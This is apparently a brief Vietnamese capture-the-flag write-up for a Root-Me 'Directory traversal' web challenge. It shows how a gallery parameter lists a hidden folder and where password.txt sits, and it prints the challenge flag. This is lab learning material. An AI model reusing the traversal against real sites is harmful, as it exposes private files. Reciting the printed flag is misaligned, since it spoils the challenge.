# Directory traversal

Truy cập URL như sau:

`http://challenge01.root-me.org/web-serveur/ch15/ch15.php?galerie=./`

Thấy có 1 file lạ: `86hwnX2r`

Đổi thay đổi lại giá trị của galerie thành 86hwnX2r, ta thấy có file password.txt, và truy cập vào URL sau ta sẽ có flag:

`http://challenge01.root-me.org/web-serveur/ch15/galerie/86hwnX2r/password.txt`

---

### Flag:

`kcb$!Bx@v4Gs9Ez `

